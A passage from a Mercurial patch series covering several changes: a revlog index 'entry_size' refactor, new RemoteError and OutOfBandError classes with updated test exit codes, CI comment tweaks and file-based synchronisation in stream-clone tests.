self._data[index : index + self.entry_size] r = self.index_format.unpack(data) if self._lgt and i == 0: r = (offset_type(0, gettype(r[0])),) + r[1:] @@ -125,13 +127,13 @@ class IndexObject(BaseIndexObject): def __init__(self, data): - assert len(data) % self.index_size == 0 + assert len(data) % self.entry_size == 0 self._data = data - self._lgt = len(data) // self.index_size + self._lgt = len(data) // self.entry_size self._extra = [] def _calculate_index(self, i): - return i * self.index_size + return i * self.entry_size def __delitem__(self, i): if not isinstance(i, slice) or not i.stop == -1 or i.step is not None: @@ -140,7 +142,7 @@ self._check_index(i) self._stripnodes(i) if i < self._lgt: - self._data = self._data[: i * self.index_size] + self._data = self._data[: i * self.entry_size] self._lgt = i self._extra = [] else: @@ -203,7 +205,7 @@ if lgt is not None: self._offsets = [0] * lgt count = 0 - while off <= len(self._data) - self.index_size: + while off <= len(self._data) - self.entry_size: start = off + self.big_int_size (s,) = struct.unpack( b'>i', @@ -212,7 +214,7 @@ if lgt is not None: self._offsets[count] = off count += 1 - off += self.index_size + s + off += self.entry_size + s if off != len(self._data): raise ValueError(b"corrupted data") return count @@ -244,7 +246,6 @@ class Index2Mixin(object): index_format = revlog_constants.INDEX_ENTRY_V2 - index_size = revlog_constants.INDEX_ENTRY_V2.size null_item = (0, 0, 0, -1, -1, -1, -1, nullid, 0, 0) def replace_sidedata_info(self, i, sidedata_offset, sidedata_length): @@ -280,7 +281,7 @@ if lgt is not None: self._offsets = [0] * lgt count = 0 - while off <= len(self._data) - self.index_size: + while off <= len(self._data) - self.entry_size: start = off + self.big_int_size (data_size,) = struct.unpack( b'>i', @@ -293,7 +294,7 @@ if lgt is not None: self._offsets[count] = off count += 1 - off += self.index_size + data_size + side_data_size + off += self.entry_size + data_size + side_data_size if off != len(self._data): raise ValueError(b"corrupted data") return count diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -222,6 +222,8 @@ class revlogoldindex(list): + entry_size = INDEX_ENTRY_V0.size + @property def nodemap(self): msg = b"index.nodemap is deprecated, use index.[has_node|rev|get_rev]" @@ -273,11 +275,8 @@ class revlogoldio(object): - def __init__(self): - self.size = INDEX_ENTRY_V0.size - def parseindex(self, data, inline): - s = self.size + s = INDEX_ENTRY_V0.size index = [] nodemap = nodemaputil.NodeMap({nullid: nullrev}) n = off = 0 @@ -334,9 +333,6 @@ class revlogio(object): - def __init__(self): - self.size = INDEX_ENTRY_V1.size - def parseindex(self, data, inline): # call the C implementation to parse the index data index, cache = parsers.parse_index2(data, inline) @@ -350,9 +346,6 @@ class revlogv2io(object): - def __init__(self): - self.size = INDEX_ENTRY_V2.size - def parseindex(self, data, inline): index, cache = parsers.parse_index2(data, inline, revlogv2=True) return index, cache @@ -1716,8 +1709,8 @@ end = int(iend[0] >> 16) + iend[1] if self._inline: - start += (startrev + 1) * self._io.size - end += (endrev + 1) * self._io.size + start += (startrev + 1) * self.index.entry_size + end += (endrev + 1) * self.index.entry_size length = end - start return start, self._getsegment(start, length, df=df) @@ -1751,7 +1744,7 @@ start = self.start length = self.length inline = self._inline - iosize = self._io.size + iosize = self.index.entry_size buffer = util.buffer l = [] @@ -1979,7 +1972,7 @@ sidedata_size = index_entry[9] if self._inline: - sidedata_offset += self._io.size * (1 + rev) + sidedata_offset += self.index.entry_size * (1 + rev) if sidedata_size == 0: return {} @@ -2079,7 +2072,7 @@ # the temp file replace the real index when we exit the context # manager - tr.replace(self.indexfile, trindex * self._io.size) + tr.replace(self.indexfile, trindex * self.index.entry_size) nodemaputil.setup_persistent_nodemap(tr, self) self._chunkclear() @@ -2335,12 +2328,12 @@ # offset is "as if" it were in the .d file, so we need to add on # the size of the entry metadata. self._concurrencychecker( - ifh, self.indexfile, offset + curr * self._io.size + ifh, self.indexfile, offset + curr * self.index.entry_size ) else: # Entries in the .i are a consistent size. self._concurrencychecker( - ifh, self.indexfile, curr * self._io.size + ifh, self.indexfile, curr * self.index.entry_size ) self._concurrencychecker(dfh, self.datafile, offset) @@ -2464,7 +2457,7 @@ dfh.write(sidedata) ifh.write(entry) else: - offset += curr * self._io.size + offset += curr * self.index.entry_size transaction.add(self.indexfile, offset) ifh.write(entry) ifh.write(data[0]) @@ -2502,7 +2495,7 @@ if r: end = self.end(r - 1) ifh = self._indexfp(b"a+") - isize = r * self._io.size + isize = r * self.index.entry_size if self._inline: transaction.add(self.indexfile, end + isize) dfh = None @@ -2658,9 +2651,9 @@ end = self.start(rev) if not self._inline: transaction.add(self.datafile, end) - end = rev * self._io.size + end = rev * self.index.entry_size else: - end += rev * self._io.size + end += rev * self.index.entry_size transaction.add(self.indexfile, end) @@ -2699,7 +2692,7 @@ f.seek(0, io.SEEK_END) actual = f.tell() f.close() - s = self._io.size + s = self.index.entry_size i = max(0, actual // s) di = actual - (i * s) if self._inline: @@ -3241,7 +3234,7 @@ # rewrite the new index entries with self._indexfp(b'w+') as fp: - fp.seek(startrev * self._io.size) + fp.seek(startrev * self.index.entry_size) for i, entry in enumerate(new_entries): rev = startrev + i self.index.replace_sidedata_info(rev, entry[8], entry[9]) diff --git a/rust/hg-cpython/src/revlog.rs b/rust/hg-cpython/src/revlog.rs --- a/rust/hg-cpython/src/revlog.rs +++ b/rust/hg-cpython/src/revlog.rs @@ -12,8 +12,8 @@ use cpython::{ buffer::{Element, PyBuffer}, exc::{IndexError, ValueError}, - ObjectProtocol, PyBytes, PyClone, PyDict, PyErr, PyModule, PyObject, - PyResult, PyString, PyTuple, Python, PythonObject, ToPyObject, + ObjectProtocol, PyBytes, PyClone, PyDict, PyErr, PyInt, PyModule, + PyObject, PyResult, PyString, PyTuple, Python, PythonObject, ToPyObject, }; use hg::{ nodemap::{Block, NodeMapError, NodeTree}, @@ -285,6 +285,10 @@ self.inner_update_nodemap_data(py, docket, nm_data) } + @property + def entry_size(&self) -> PyResult<PyInt> { + self.cindex(py).borrow().inner().getattr(py, "entry_size")?.extract::<PyInt>(py) + } }); # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1618854555 25200 # Mon Apr 19 10:49:15 2021 -0700 # Node ID 14ddb1dca2c012da0f753caacee4ed48b8afd954 # Parent 3c9208702db39a61f049f68dbe186acae79ee6f5 errors: make OutOfBandError extend Abort I'm about to create a new `RemoteError` exception and make `OutOfBandError` extend it. This patch prepares for that. Differential Revision: https://phab.mercurial-scm.org/D10465 diff --git a/mercurial/error.py b/mercurial/error.py --- a/mercurial/error.py +++ b/mercurial/error.py @@ -304,10 +304,19 @@ Abort.__init__(self, _(b'response expected')) -class OutOfBandError(Hint, Exception): +class OutOfBandError(Abort): """Exception raised when a remote repo reports failure""" - __bytes__ = _tobytes + def __init__(self, *messages, **kwargs): + from .i18n import _ + + if messages: + message = _(b"remote error:\n%s") % b''.join(messages) + # Abort.format() adds a trailing newline + message = message.rstrip(b'\n') + else: + message = _(b"remote error") + super(OutOfBandError, self).__init__(message, **kwargs) class ParseError(Abort): diff --git a/mercurial/scmutil.py b/mercurial/scmutil.py --- a/mercurial/scmutil.py +++ b/mercurial/scmutil.py @@ -181,17 +181,6 @@ encoding.strtolocal(inst.strerror), ) ) - except error.OutOfBandError as inst: - detailed_exit_code = 100 - if inst.args: - msg = _(b"abort: remote error:\n") - else: - msg = _(b"abort: remote error\n") - ui.error(msg) - if inst.args: - ui.error(b''.join(inst.args)) - if inst.hint: - ui.error(b'(%s)\n' % inst.hint) except error.RepoError as inst: ui.error(_(b"abort: %s\n") % inst) if inst.hint: @@ -233,6 +222,8 @@ detailed_exit_code = 30 elif isinstance(inst, error.HookAbort): detailed_exit_code = 40 + elif isinstance(inst, error.OutOfBandError): + detailed_exit_code = 100 elif isinstance(inst, error.SecurityError): detailed_exit_code = 150 elif isinstance(inst, error.CanceledError): # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1618850221 25200 # Mon Apr 19 09:37:01 2021 -0700 # Node ID f9482db16cef127a7900b67e8d160263373855af # Parent 14ddb1dca2c012da0f753caacee4ed48b8afd954 errors: introduce a class for remote errors Having an exception for remote errors makes it much easier to exit with the right detailed exit code. Differential Revision: https://phab.mercurial-scm.org/D10466 diff --git a/mercurial/error.py b/mercurial/error.py --- a/mercurial/error.py +++ b/mercurial/error.py @@ -304,7 +304,11 @@ Abort.__init__(self, _(b'response expected')) -class OutOfBandError(Abort): +class RemoteError(Abort): + """Exception raised when interacting with a remote repo fails""" + + +class OutOfBandError(RemoteError): """Exception raised when a remote repo reports failure""" def __init__(self, *messages, **kwargs): diff --git a/mercurial/scmutil.py b/mercurial/scmutil.py --- a/mercurial/scmutil.py +++ b/mercurial/scmutil.py @@ -222,7 +222,7 @@ detailed_exit_code = 30 elif isinstance(inst, error.HookAbort): detailed_exit_code = 40 - elif isinstance(inst, error.OutOfBandError): + elif isinstance(inst, error.RemoteError): detailed_exit_code = 100 elif isinstance(inst, error.SecurityError): detailed_exit_code = 150 # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1618861943 25200 # Mon Apr 19 12:52:23 2021 -0700 # Node ID 3f87d2af0bd686bd076912d42520b51f139186f9 # Parent f9482db16cef127a7900b67e8d160263373855af errors: raise RemoteError in some places in exchange.py This is part of https://www.mercurial-scm.org/wiki/ErrorCategoriesPlan Differential Revision: https://phab.mercurial-scm.org/D10467 diff --git a/mercurial/exchange.py b/mercurial/exchange.py --- a/mercurial/exchange.py +++ b/mercurial/exchange.py @@ -1147,19 +1147,19 @@ }, ).result() except error.BundleValueError as exc: - raise error.Abort(_(b'missing support for %s') % exc) + raise error.RemoteError(_(b'missing support for %s') % exc) try: trgetter = None if pushback: trgetter = pushop.trmanager.transaction op = bundle2.processbundle(pushop.repo, reply, trgetter) except error.BundleValueError as exc: - raise error.Abort(_(b'missing support for %s') % exc) + raise error.RemoteError(_(b'missing support for %s') % exc) except bundle2.AbortFromPart as exc: pushop.ui.error(_(b'remote: %s\n') % exc) if exc.hint is not None: pushop.ui.error(_(b'remote: %s\n') % (b'(%s)' % exc.hint)) - raise error.Abort(_(b'push failed on remote')) + raise error.RemoteError(_(b'push failed on remote')) except error.PushkeyFailed as exc: partid = int(exc.partid) if partid not in pushop.pkfailcb: @@ -1875,9 +1875,9 @@ bundle2.processbundle(pullop.repo, bundle, op=op) except bundle2.AbortFromPart as exc: pullop.repo.ui.error(_(b'remote: abort: %s\n') % exc) - raise error.Abort(_(b'pull failed on remote'), hint=exc.hint) + raise error.RemoteError(_(b'pull failed on remote'), hint=exc.hint) except error.BundleValueError as exc: - raise error.Abort(_(b'missing support for %s') % exc) + raise error.RemoteError(_(b'missing support for %s') % exc) if pullop.fetch: pullop.cgresult = bundle2.combinechangegroupresults(op) diff --git a/tests/test-bookmarks-pushpull.t b/tests/test-bookmarks-pushpull.t --- a/tests/test-bookmarks-pushpull.t +++ b/tests/test-bookmarks-pushpull.t @@ -1217,7 +1217,7 @@ no changes found remote: prepushkey hook exited with status 1 abort: push failed on remote - [255] + [100] #endif @@ -1257,7 +1257,7 @@ no changes found remote: prepushkey hook exited with status 1 abort: push failed on remote - [255] + [100] #endif @@ -1334,7 +1334,7 @@ no changes found remote: prepushkey.no-bm-move hook exited with status 1 abort: push failed on remote - [255] + [100] #endif -- test for pushing bookmarks pointing to secret changesets diff --git a/tests/test-bundle2-exchange.t b/tests/test-bundle2-exchange.t --- a/tests/test-bundle2-exchange.t +++ b/tests/test-bundle2-exchange.t @@ -548,7 +548,7 @@ remote: Abandon ship! remote: (don't panic) abort: push failed on remote - [255] + [100] $ hg -R main push http://localhost:$HGPORT2/ -r e7ec4e813ba6 pushing to http://localhost:$HGPORT2/ @@ -556,7 +556,7 @@ remote: Abandon ship! remote: (don't panic) abort: push failed on remote - [255] + [100] Doing the actual push: unknown mandatory parts @@ -570,19 +570,19 @@ pushing to other searching for changes abort: missing support for test:unknown - [255] + [100] $ hg -R main push ssh://user@dummy/other -r e7ec4e813ba6 pushing to ssh://user@dummy/other searching for changes abort: missing support for test:unknown - [255] + [100] $ hg -R main push http://localhost:$HGPORT2/ -r e7ec4e813ba6 pushing to http://localhost:$HGPORT2/ searching for changes abort: missing support for test:unknown - [255] + [100] Doing the actual push: race @@ -653,7 +653,7 @@ remote: rollback completed remote: pretxnclose.failpush hook exited with status 1 abort: push failed on remote - [255] + [100] $ hg -R main push http://localhost:$HGPORT2/ -r e7ec4e813ba6 pushing to http://localhost:$HGPORT2/ @@ -668,7 +668,7 @@ remote: rollback completed remote: pretxnclose.failpush hook exited with status 1 abort: push failed on remote - [255] + [100] (check that no 'pending' files remain) @@ -712,7 +712,7 @@ remote: rollback completed remote: pretxnchangegroup hook exited with status 1 abort: push failed on remote - [255] + [100] $ hg -R main push http://localhost:$HGPORT2/ -r e7ec4e813ba6 pushing to http://localhost:$HGPORT2/ searching for changes @@ -725,7 +725,7 @@ remote: rollback completed remote: pretxnchangegroup hook exited with status 1 abort: push failed on remote - [255] + [100] Check output capture control. @@ -760,7 +760,7 @@ remote: rollback completed remote: pretxnchangegroup hook exited with status 1 abort: push failed on remote - [255] + [100] $ hg -R main push http://localhost:$HGPORT2/ -r e7ec4e813ba6 pushing to http://localhost:$HGPORT2/ searching for changes @@ -773,7 +773,7 @@ remote: rollback completed remote: pretxnchangegroup hook exited with status 1 abort: push failed on remote - [255] + [100] Check abort from mandatory pushkey @@ -950,7 +950,7 @@ searching for changes remote: Lock should not be taken abort: push failed on remote - [255] + [100] $ cat >> ../lazylock/.hg/hgrc <<EOF > [experimental] diff --git a/tests/test-bundle2-remote-changegroup.t b/tests/test-bundle2-remote-changegroup.t --- a/tests/test-bundle2-remote-changegroup.t +++ b/tests/test-bundle2-remote-changegroup.t @@ -542,7 +542,7 @@ searching for changes remote: remote-changegroup abort: missing support for remote-changegroup - digest:foo - [255] + [100] Missing digest diff --git a/tests/test-clone-uncompressed.t b/tests/test-clone-uncompressed.t --- a/tests/test-clone-uncompressed.t +++ b/tests/test-clone-uncompressed.t @@ -408,7 +408,7 @@ remote: abort: server has pull-based clones disabled abort: pull failed on remote (remove --pull if specified or upgrade Mercurial) - [255] + [100] Local stream clone with secrets involved (This is just a test over behavior: if you have access to the repo's files, @@ -629,7 +629,7 @@ streaming all changes remote: abort: server has obsolescence markers, but client cannot receive them via stream clone abort: pull failed on remote - [255] + [100] $ killdaemons.py diff --git a/tests/test-http.t b/tests/test-http.t --- a/tests/test-http.t +++ b/tests/test-http.t @@ -505,7 +505,7 @@ requesting all changes remote: abort: this is an exercise abort: pull failed on remote - [255] + [100] $ cat error.log disable pull-based clones @@ -517,7 +517,7 @@ remote: abort: server has pull-based clones disabled abort: pull failed on remote (remove --pull if specified or upgrade Mercurial) - [255] + [100] #if no-reposimplestore ... but keep stream clones working diff --git a/tests/test-lfs-serve.t b/tests/test-lfs-serve.t --- a/tests/test-lfs-serve.t +++ b/tests/test-lfs-serve.t @@ -293,7 +293,7 @@ requesting all changes remote: abort: no common changegroup version abort: pull failed on remote - [255] + [100] $ grep 'lfs' $TESTTMP/client4_pull/.hg/requires $SERVER_REQUIRES $TESTTMP/server/.hg/requires:lfs diff --git a/tests/test-narrow-clone-stream.t b/tests/test-narrow-clone-stream.t --- a/tests/test-narrow-clone-stream.t +++ b/tests/test-narrow-clone-stream.t @@ -39,7 +39,7 @@ streaming all changes remote: abort: server does not support narrow stream clones abort: pull failed on remote - [255] + [100] Enable stream clone on the server diff --git a/tests/test-narrow-pull.t b/tests/test-narrow-pull.t --- a/tests/test-narrow-pull.t +++ b/tests/test-narrow-pull.t @@ -151,4 +151,4 @@ transaction abort! rollback completed abort: pull failed on remote - [255] + [100] diff --git a/tests/test-narrow-shallow.t b/tests/test-narrow-shallow.t --- a/tests/test-narrow-shallow.t +++ b/tests/test-narrow-shallow.t @@ -110,9 +110,9 @@ requesting all changes remote: abort: depth must be positive, got 0 abort: pull failed on remote - [255] + [100] $ hg clone --narrow ssh://user@dummy/master bad --include "d2" --depth -1 requesting all changes remote: abort: depth must be positive, got -1 abort: pull failed on remote - [255] + [100] diff --git a/tests/test-remotefilelog-clone-tree.t b/tests/test-remotefilelog-clone-tree.t --- a/tests/test-remotefilelog-clone-tree.t +++ b/tests/test-remotefilelog-clone-tree.t @@ -95,7 +95,7 @@ # flakiness here $ hg clone --noupdate ssh://user@dummy/shallow full 2>/dev/null streaming all changes - [255] + [100] # getbundle full clone diff --git a/tests/test-remotefilelog-clone.t b/tests/test-remotefilelog-clone.t --- a/tests/test-remotefilelog-clone.t +++ b/tests/test-remotefilelog-clone.t @@ -89,7 +89,7 @@ $ TEMP_STDERR=full-clone-from-shallow.stderr.tmp $ hg clone --noupdate ssh://user@dummy/shallow full 2>$TEMP_STDERR streaming all changes - [255] + [100] $ cat $TEMP_STDERR remote: abort: Cannot clone from a shallow repo to a full repo. abort: pull failed on remote diff --git a/tests/test-ssh.t b/tests/test-ssh.t --- a/tests/test-ssh.t +++ b/tests/test-ssh.t @@ -487,7 +487,7 @@ remote: Permission denied remote: pretxnopen.hg-ssh hook failed abort: push failed on remote - [255] + [100] $ cd $TESTTMP @@ -681,7 +681,7 @@ remote: rollback completed remote: pretxnchangegroup.fail hook failed abort: push failed on remote - [255] + [100] abort during pull is properly reported as such @@ -696,7 +696,7 @@ searching for changes remote: abort: this is an exercise abort: pull failed on remote - [255] + [100] abort with no error hint when there is a ssh problem when pulling # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1618876425 25200 # Mon Apr 19 16:53:45 2021 -0700 # Node ID dc8976cc3a6ed4ddb89ade34144a28ceb59864be # Parent 3f87d2af0bd686bd076912d42520b51f139186f9 tests: make test-archive.t pass on py3.9 (issue6504) Something got stricter at parsing URL query parameters and now the parameters need to be separated by "&"; ";" is no longer allowed. See issue6504 for details. Differential Revision: https://phab.mercurial-scm.org/D10472 diff --git a/tests/test-archive.t b/tests/test-archive.t --- a/tests/test-archive.t +++ b/tests/test-archive.t @@ -334,10 +334,10 @@ > pass > if len(sys.argv) <= 3: > node, archive = sys.argv[1:] - > requeststr = 'cmd=archive;node=%s;type=%s' % (node, archive) + > requeststr = 'cmd=archive&node=%s&type=%s' % (node, archive) > else: > node, archive, file = sys.argv[1:] - > requeststr = 'cmd=archive;node=%s;type=%s;file=%s' % (node, archive, file) + > requeststr = 'cmd=archive&node=%s&type=%s&file=%s' % (node, archive, file) > try: > stdout = sys.stdout.buffer > except AttributeError: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618823051 -7200 # Mon Apr 19 11:04:11 2021 +0200 # Node ID 66cc5f867ddccbb685a45b450d475e2b867b5f61 # Parent dc8976cc3a6ed4ddb89ade34144a28ceb59864be phab-refresh: extract the comment in a variable This make the script more readable and it is about to become more complex. Differential Revision: https://phab.mercurial-scm.org/D10463 diff --git a/contrib/heptapod-ci.yml b/contrib/heptapod-ci.yml --- a/contrib/heptapod-ci.yml +++ b/contrib/heptapod-ci.yml @@ -51,8 +51,10 @@ phabricator-refresh: stage: phabricator + variables: + DEFAULT_COMMENT: ":white_check_mark: refresh by Heptapod after a successful CI run (:octopus: :green_heart:)" script: - - "./contrib/phab-refresh-stack.sh --comment \":white_check_mark: refresh by Heptapod after a successful CI run (:octopus: :green_heart:)\"" + - "./contrib/phab-refresh-stack.sh --comment \"$DEFAULT_COMMENT\"" test-py2: <<: *runtests # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618823416 -7200 # Mon Apr 19 11:10:16 2021 +0200 # Node ID 75351b8b20821514f59c9cee9bf557e6de7589ea # Parent 66cc5f867ddccbb685a45b450d475e2b867b5f61 phab-refresh: use a special comment on the stable branch Phabricator make it hard to spot the branch information. As a result patch intended for stable are consistently queued for default. We add a special command and flashy GIF to try to attract reviewer attention on the fact patch are intended for stable. Differential Revision: https://phab.mercurial-scm.org/D10464 diff --git a/contrib/heptapod-ci.yml b/contrib/heptapod-ci.yml --- a/contrib/heptapod-ci.yml +++ b/contrib/heptapod-ci.yml @@ -53,8 +53,14 @@ stage: phabricator variables: DEFAULT_COMMENT: ":white_check_mark: refresh by Heptapod after a successful CI run (:octopus: :green_heart:)" + STABLE_COMMENT: ":white_check_mark: refresh by Heptapod after a successful CI run (:octopus: :green_heart:)\n⚠ This patch is intended for stable ⚠\n{image https://media.giphy.com/media/nYI8SmmChYXK0/source.gif}" script: - - "./contrib/phab-refresh-stack.sh --comment \"$DEFAULT_COMMENT\"" + - | + if [ `hg branch` == "stable" ]; then + ./contrib/phab-refresh-stack.sh --comment "$STABLE_COMMENT"; + else + ./contrib/phab-refresh-stack.sh --comment "$DEFAULT_COMMENT"; + fi test-py2: <<: *runtests # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1618893084 25200 # Mon Apr 19 21:31:24 2021 -0700 # Node ID abd18d6306f15da1d386dd1fbe704b0f66c64f77 # Parent 75351b8b20821514f59c9cee9bf557e6de7589ea errors: remove unnecessary varargs handling from OutOfBandError In my recent D10465, I moved some code over from scmutil into `OutOfBandError.__init__`. The code was written to deal with an arbitrary number of `message` arguments to the constructor. It turns out that we only ever pass 0 or 1. Given that, let's simplify it. Differential Revision: https://phab.mercurial-scm.org/D10483 diff --git a/mercurial/error.py b/mercurial/error.py --- a/mercurial/error.py +++ b/mercurial/error.py @@ -311,16 +311,15 @@ class OutOfBandError(RemoteError): """Exception raised when a remote repo reports failure""" - def __init__(self, *messages, **kwargs): + def __init__(self, message=None, hint=None): from .i18n import _ - if messages: - message = _(b"remote error:\n%s") % b''.join(messages) + if message: # Abort.format() adds a trailing newline - message = message.rstrip(b'\n') + message = _(b"remote error:\n%s") % message.rstrip(b'\n') else: message = _(b"remote error") - super(OutOfBandError, self).__init__(message, **kwargs) + super(OutOfBandError, self).__init__(message, hint=hint) class ParseError(Abort): # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1618892636 14400 # Tue Apr 20 00:23:56 2021 -0400 # Node ID d467bae86b2d03758d6a9efbf2613660e56fa924 # Parent abd18d6306f15da1d386dd1fbe704b0f66c64f77 mail: use a context manager when writing to mbox Differential Revision: https://phab.mercurial-scm.org/D10484 diff --git a/mercurial/mail.py b/mercurial/mail.py --- a/mercurial/mail.py +++ b/mercurial/mail.py @@ -208,17 +208,16 @@ def _mbox(mbox, sender, recipients, msg): '''write mails to mbox''' - fp = open(mbox, b'ab+') - # Should be time.asctime(), but Windows prints 2-characters day - # of month instead of one. Make them print the same thing. - date = time.strftime('%a %b %d %H:%M:%S %Y', time.localtime()) - fp.write( - b'From %s %s\n' - % (encoding.strtolocal(sender), encoding.strtolocal(date)) - ) - fp.write(msg) - fp.write(b'\n\n') - fp.close() + with open(mbox, b'ab+') as fp: + # Should be time.asctime(), but Windows prints 2-characters day + # of month instead of one. Make them print the same thing. + date = time.strftime('%a %b %d %H:%M:%S %Y', time.localtime()) + fp.write( + b'From %s %s\n' + % (encoding.strtolocal(sender), encoding.strtolocal(date)) + ) + fp.write(msg) + fp.write(b'\n\n') def connect(ui, mbox=None): # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618852158 -7200 # Mon Apr 19 19:09:18 2021 +0200 # Node ID e38718838808f03dea5eb7aeb14070b1ae3cc10a # Parent d467bae86b2d03758d6a9efbf2613660e56fa924 streamclone: check the errors log in tests Code can be buggy, in that case having error message tend to help. Differential Revision: https://phab.mercurial-scm.org/D10475 diff --git a/tests/test-clone-uncompressed.t b/tests/test-clone-uncompressed.t --- a/tests/test-clone-uncompressed.t +++ b/tests/test-clone-uncompressed.t @@ -169,7 +169,7 @@ $ killdaemons.py $ cd server - $ hg serve -p $HGPORT -d --pid-file=hg.pid + $ hg serve -p $HGPORT -d --pid-file=hg.pid --error errors.txt $ cat hg.pid > $DAEMON_PIDS $ cd .. @@ -184,6 +184,7 @@ transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found + $ cat server/errors.txt #endif #if stream-bundle2 $ hg clone --stream -U http://localhost:$HGPORT clone1 @@ -205,6 +206,7 @@ rbc-revs-v1 tags2 tags2-served + $ cat server/errors.txt #endif getbundle requests with stream=1 are uncompressed # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618852218 -7200 # Mon Apr 19 19:10:18 2021 +0200 # Node ID 99c629101b738ae88dc5c7ac1b74c60dd75d9efd # Parent e38718838808f03dea5eb7aeb14070b1ae3cc10a testing: add a utility function to wait for file create This is similar to `tests/testlib/wait-on-file`, but for the python code Differential Revision: https://phab.mercurial-scm.org/D10476 diff --git a/mercurial/testing/__init__.py b/mercurial/testing/__init__.py --- a/mercurial/testing/__init__.py +++ b/mercurial/testing/__init__.py @@ -0,0 +1,30 @@ +from __future__ import ( + absolute_import, + division, +) + +import os +import time + + +# work around check-code complains +# +# This is a simple log level module doing simple test related work, we can't +# import more things, and we do not need it. +environ = getattr(os, 'environ') + + +def _timeout_factor(): + """return the current modification to timeout""" + default = int(environ.get('HGTEST_TIMEOUT_DEFAULT', 1)) + current = int(environ.get('HGTEST_TIMEOUT', default)) + return current / float(default) + + +def wait_file(path, timeout=10): + timeout *= _timeout_factor() + start = time.time() + while not os.path.exists(path): + if time.time() - start > timeout: + raise RuntimeError(b"timed out waiting for file: %s" % path) + time.sleep(0.01) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618852249 -7200 # Mon Apr 19 19:10:49 2021 +0200 # Node ID 52cee44aa1a073fa34b79c7b03eea53e2a803169 # Parent 99c629101b738ae88dc5c7ac1b74c60dd75d9efd testing: add a `write_file` function The function is kinda trivial, but having a simple function avoid silly mistake. Differential Revision: https://phab.mercurial-scm.org/D10477 diff --git a/mercurial/testing/__init__.py b/mercurial/testing/__init__.py --- a/mercurial/testing/__init__.py +++ b/mercurial/testing/__init__.py @@ -28,3 +28,8 @@ if time.time() - start > timeout: raise RuntimeError(b"timed out waiting for file: %s" % path) time.sleep(0.01) + + +def write_file(path, content=b''): + with open(path, 'wb') as f: + f.write(content) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618852348 -7200 # Mon Apr 19 19:12:28 2021 +0200 # Node ID faa43f09ad980b7ea36c95ea39708fbcf11c692f # Parent 52cee44aa1a073fa34b79c7b03eea53e2a803169 streamclone: remove sleep based "synchronisation" in tests Sleep based test synchronisation does not work. Variation in machine performance and load can make the two process miss their windows. Instead we migrate to explicit signaling through the file system as other tests file are using. Differential Revision: https://phab.mercurial-scm.org/D10478 diff --git a/mercurial/streamclone.py b/mercurial/streamclone.py --- a/mercurial/streamclone.py +++ b/mercurial/streamclone.py @@ -247,6 +247,8 @@ if size: entries.append((name, size)) total_bytes += size + _test_sync_point_walk_1(repo) + _test_sync_point_walk_2(repo) repo.ui.debug( b'%d files, %d bytes to transfer\n' % (len(entries), total_bytes) @@ -593,6 +595,14 @@ fp.close() +def _test_sync_point_walk_1(repo): + """a function for synchronisation during tests""" + + +def _test_sync_point_walk_2(repo): + """a function for synchronisation during tests""" + + def generatev2(repo, includes, excludes, includeobsmarkers): """Emit content for version 2 of a streaming clone. @@ -635,6 +645,8 @@ chunks = _emit2(repo, entries, totalfilesize) first = next(chunks) assert first is None + _test_sync_point_walk_1(repo) + _test_sync_point_walk_2(repo) return len(entries), totalfilesize, chunks diff --git a/tests/test-clone-uncompressed.t b/tests/test-clone-uncompressed.t --- a/tests/test-clone-uncompressed.t +++ b/tests/test-clone-uncompressed.t @@ -433,14 +433,35 @@ extension for delaying the server process so we reliably can modify the repo while cloning - $ cat > delayer.py <<EOF - > import time - > from mercurial import extensions, vfs - > def __call__(orig, self, path, *args, **kwargs): - > if path == 'data/f1.i': - > time.sleep(2) - > return orig(self, path, *args, **kwargs) - > extensions.wrapfunction(vfs.vfs, '__call__', __call__) + $ cat > stream_steps.py <<EOF + > import os + > import sys + > from mercurial import ( + > encoding, + > extensions, + > streamclone, + > testing, + > ) + > WALKED_FILE_1 = encoding.environ[b'HG_TEST_STREAM_WALKED_FILE_1'] + > WALKED_FILE_2 = encoding.environ[b'HG_TEST_STREAM_WALKED_FILE_2'] + > + > def _test_sync_point_walk_1(orig, repo): + > testing.write_file(WALKED_FILE_1) + > + > def _test_sync_point_walk_2(orig, repo): + > assert repo._currentlock(repo._lockref) is None + > testing.wait_file(WALKED_FILE_2) + > + > extensions.wrapfunction( + > streamclone, + > '_test_sync_point_walk_1', + > _test_sync_point_walk_1 + > ) + > extensions.wrapfunction( + > streamclone, + > '_test_sync_point_walk_2', + > _test_sync_point_walk_2 + > ) > EOF prepare repo with small and big file to cover both code paths in emitrevlogdata @@ -449,20 +470,32 @@ $ touch repo/f1 $ $TESTDIR/seq.py 50000 > repo/f2 $ hg -R repo ci -Aqm "0" - $ hg serve -R repo -p $HGPORT1 -d --pid-file=hg.pid --config extensions.delayer=delayer.py + $ HG_TEST_STREAM_WALKED_FILE_1="$TESTTMP/sync_file_walked_1" + $ export HG_TEST_STREAM_WALKED_FILE_1 + $ HG_TEST_STREAM_WALKED_FILE_2="$TESTTMP/sync_file_walked_2" + $ export HG_TEST_STREAM_WALKED_FILE_2 + $ HG_TEST_STREAM_WALKED_FILE_3="$TESTTMP/sync_file_walked_3" + $ export HG_TEST_STREAM_WALKED_FILE_3 +# $ cat << EOF >> $HGRCPATH +# > [hooks] +# > pre-clone=rm -f "$TESTTMP/sync_file_walked_*" +# > EOF + $ hg serve -R repo -p $HGPORT1 -d --error errors.log --pid-file=hg.pid --config extensions.stream_steps="$RUNTESTDIR/testlib/ext-stream-clone-steps.py" $ cat hg.pid >> $DAEMON_PIDS clone while modifying the repo between stating file with write lock and actually serving file content - $ hg clone -q --stream -U http://localhost:$HGPORT1 clone & - $ sleep 1 + $ (hg clone -q 